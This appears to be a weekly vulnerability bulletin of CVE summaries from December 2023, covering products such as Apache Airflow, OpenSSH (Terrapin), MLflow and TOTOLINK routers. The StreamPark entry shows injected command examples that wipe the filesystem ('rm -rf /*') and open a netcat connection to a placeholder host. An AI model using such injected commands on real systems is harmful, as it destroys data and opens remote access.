enterprise_server — enterprise_serverAn incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-212.7CVE-2023-51380
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
gallagher — controller_6000Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller’s default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier.2023-12-182.4CVE-2023-41967
[email protected]
gallagher — multiple_productsImproper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.2023-12-183.1CVE-2023-22439
[email protected]
gitlab — gitlabAn issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of.2023-12-153.5CVE-2023-3511
[email protected]
[email protected]
keycloak — keycloakKeycloak’s device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client.2023-12-213.5CVE-2023-2585
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
libssh — libsshA flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.2023-12-193.7CVE-2023-6918
[email protected]
[email protected]
[email protected]
[email protected]
nautobot — nautobotNautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.02023-12-223.5CVE-2023-51649
[email protected]
[email protected]
[email protected]
[email protected]
nextcloud — security-advisoriesNextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.32023-12-223.5CVE-2023-48308
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability.2023-12-213.5CVE-2023-7050
[email protected]
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740.2023-12-223.1CVE-2023-7053
[email protected]
[email protected]
[email protected]
slawkens — myaacA vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848.2023-12-223.5CVE-2023-7076
[email protected]
[email protected]
[email protected]
[email protected]
sourcecodester — online_student_management_systemA vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability.2023-12-192.4CVE-2023-6945
[email protected]
[email protected]
[email protected]
sourcecodester — school_visitor_log_e-bookA vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability.2023-12-223.5CVE-2023-7059
[email protected]
[email protected]
[email protected]
w3c — online-spellchecker-pyA vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability.2023-12-233.1CVE-2014-125108
[email protected]
[email protected]
[email protected]
wordpress — wordpressTime-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0.2023-12-193.7CVE-2022-45809
[email protected]
wordpress — wordpress
 		Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz. This issue affects Comments – wpDiscuz: from n/a through 7.6.3.2023-12-202.7CVE-2023-46311
[email protected]

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product		DescriptionPublishedCVSS ScoreSource & Patch Info
apache — airflowApache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data – more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser – which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability2023-12-21not yet calculatedCVE-2023-47265
[email protected]
[email protected]
[email protected]
apache — airflowApache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn’t. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.2023-12-21not yet calculatedCVE-2023-48291
[email protected]
[email protected]
[email protected]
apache — airflowApache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser – by the user who also had Airflow UI opened – to trigger the execution of DAGs without the user’s consent. Users are advised to upgrade to version 2.8.0 or later which is not affected2023-12-21not yet calculatedCVE-2023-49920
[email protected]
[email protected]
[email protected]
apache — iotdbDeserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.2023-12-21not yet calculatedCVE-2023-51656
[email protected]
[email protected]
apache — airflowApache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue2023-12-21not yet calculatedCVE-2023-50783
[email protected]
[email protected]
[email protected]
apple — macosA session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content.2023-12-19not yet calculatedCVE-2023-42940
[email protected]
[email protected]
array — arrayos_agMotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected.2023-12-22not yet calculatedCVE-2023-51707
[email protected]
assetwise_integrity_information_server — assetwise_integrity_information_serverBentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25.2023-12-22not yet calculatedCVE-2023-51708
[email protected]
bcoin-org — bcoinAn issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js.2023-12-21not yet calculatedCVE-2023-50475
[email protected]
[email protected]
blinksocks — blinksocksAn issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js.2023-12-21not yet calculatedCVE-2023-50481
[email protected]
[email protected]
buildkite — elastic_ci_for_awsA symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43116
[email protected]
buildkite — elastic_ci_for_awsA time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43741
[email protected]
cacti — cactiReflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php.2023-12-22not yet calculatedCVE-2023-50569
[email protected]
[email protected]
cams_biometrics — multiple_productsSQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.2023-12-15not yet calculatedCVE-2023-48050
[email protected]
cesanta — mjsBuffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (Dos), and obtain sensitive information via segmentation fault can occur in getprop_builtin_foreign when input string includes a name of Built-in APIs.2023-12-20not yet calculatedCVE-2023-50044
[email protected]
[email protected]
cryptopp —  cryptoppCrypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding.2023-12-18not yet calculatedCVE-2023-50979
[email protected]
cryptopp —  cryptoppgf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing.2023-12-18not yet calculatedCVE-2023-50980
[email protected]
cryptopp —  cryptoppModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853.2023-12-18not yet calculatedCVE-2023-50981
[email protected]
cuppacms — cuppacmsSQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.2023-12-20not yet calculatedCVE-2023-47990
[email protected]
devolutions — remote_desktop_managerInadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources.2023-12-21not yet calculatedCVE-2023-7047
[email protected]
filerun — filerunFileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request.2023-12-22not yet calculatedCVE-2022-47532
[email protected]
free5gc — free5gcAn issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.2023-12-22not yet calculatedCVE-2023-49391
[email protected]
google — chromeInsufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)2023-12-20not yet calculatedCVE-2023-3742
[email protected]
[email protected]
google — chromeHeap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2023-12-21not yet calculatedCVE-2023-7024
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
heimdal — thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module.2023-12-21not yet calculatedCVE-2023-29485
[email protected]
heimdal — thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.2023-12-21not yet calculatedCVE-2023-29486
[email protected]
heimdal — thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module.2023-12-21not yet calculatedCVE-2023-29487
[email protected]
huggingface — transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-19not yet calculatedCVE-2023-6730
[email protected]
[email protected]
huggingface — transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-20not yet calculatedCVE-2023-7018
[email protected]
[email protected]
ivanti — avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2021-22962
[email protected]
ivanti — avalancheAn unauthenticated attacked could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server.2023-12-19not yet calculatedCVE-2023-46262
[email protected]
ivanti — avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2023-46266
[email protected]
libming — libmingBuffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component.2023-12-20not yet calculatedCVE-2023-50628
[email protected]
[email protected]
linotp — linotpDefective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal.2023-12-19not yet calculatedCVE-2023-49706
[email protected]
[email protected]
[email protected]
lockss-daemon — lockss-daemonlockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.2023-12-15not yet calculatedCVE-2023-42183
[email protected]
ltb_self_service_password — ltb_self_service_passwordAn issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone.2023-12-21not yet calculatedCVE-2023-49032
[email protected]
[email protected]
mediawiki — mediawikiAn issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights.2023-12-22not yet calculatedCVE-2023-51704
[email protected]
mlflow — mlflowwith only one user interaction(download a malicious config), attackers can gain full command execution on the victim system.2023-12-19not yet calculatedCVE-2023-6940
[email protected]
[email protected]
mlflow — mlflowA malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine.2023-12-20not yet calculatedCVE-2023-6974
[email protected]
[email protected]
mlflow — mlflowA malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.2023-12-20not yet calculatedCVE-2023-6975
[email protected]
[email protected]
mlflow — mlflowThis vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process.2023-12-20not yet calculatedCVE-2023-6976
[email protected]
[email protected]
mlflow — mlflowThis vulnerability enables malicious users to read sensitive files on the server.2023-12-20not yet calculatedCVE-2023-6977
[email protected]
[email protected]
mp3gain — mp3gainA stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592.2023-12-22not yet calculatedCVE-2023-49356
[email protected]
multiple_vendors — multiple_productsMatrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate.2023-12-22not yet calculatedCVE-2023-24609
[email protected]
[email protected]
nintendo — dsDS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client’s machine via a modified GPCM message.2023-12-20not yet calculatedCVE-2023-45887
[email protected]
[email protected]
nos_client — nos_clientAn issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js.2023-12-21not yet calculatedCVE-2023-50477
[email protected]
[email protected]
openssh — opensshThe SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH’s use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in [email protected] and (if CBC is used) the [email protected] MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.2023-12-18not yet calculatedCVE-2023-48795
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
pdf24_creator — pdf24_creatorAn issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe.2023-12-19not yet calculatedCVE-2023-49147
[email protected]
[email protected]
[email protected]
phpsysinfo — phpsysinfoCross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file.2023-12-19not yet calculatedCVE-2023-49006
[email protected]
[email protected]
[email protected]
proftpd — proftpdmake_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics.2023-12-22not yet calculatedCVE-2023-51713
[email protected]
[email protected]
[email protected]
qbit-matui — qbit-matuiCross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file.2023-12-21not yet calculatedCVE-2023-50473
[email protected]
[email protected]
ruijie — ws6008Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles.2023-12-20not yet calculatedCVE-2023-50993
[email protected]
s-cms — s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51048
[email protected]
s-cms — s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51049
[email protected]
s-cms — s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51050
[email protected]
s-cms — s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51051
[email protected]
s-cms — s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51052
[email protected]
smartertools — smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name.2023-12-21not yet calculatedCVE-2023-48114
[email protected]
[email protected]
smartertools — smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request.2023-12-21not yet calculatedCVE-2023-48115
[email protected]
[email protected]
smartertools — smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment.2023-12-21not yet calculatedCVE-2023-48116
[email protected]
[email protected]
softing — edgeaggregatorSofting edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543.2023-12-19not yet calculatedCVE-2023-38126
[email protected]
stormshield_network_security — stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It’s possible to know if a specific user account exists on the SNS firewall by using remote access commands.2023-12-21not yet calculatedCVE-2023-41166
[email protected]
stormshield_network_security — stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine.2023-12-21not yet calculatedCVE-2023-47093
[email protected]
streampark — streamparkIn streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &2023-12-15not yet calculatedCVE-2023-49898
[email protected]
sudo — sudoSudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.2023-12-22not yet calculatedCVE-2023-42465
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
thirty_bees — thirty_beesA stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling.2023-12-22not yet calculatedCVE-2023-45957
[email protected]
[email protected]
[email protected]
totolink — a3700rThere is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513.2023-12-22not yet calculatedCVE-2023-50147
[email protected]
totolink — ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface.2023-12-22not yet calculatedCVE-2023-51033
[email protected]
totolink — ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface.2023-12-22not yet calculatedCVE-2023-51034
[email protected]
totolink — ex1200lTOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface.2023-12-22not yet calculatedCVE-2023-51035
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter’ of the setLanConfig interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51011
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter’ of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51012
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter’ of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51013
[email protected]
totolink — ex1800tTOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter’ of the setLanConfig interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51014
[email protected]
totolink — ex1800tTOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable parameter’ of the setDmzCfg interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51015
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51016
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter’ of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51017
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51018
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51019
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51020
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51021
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51022
[email protected]
totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51023
[email protected]
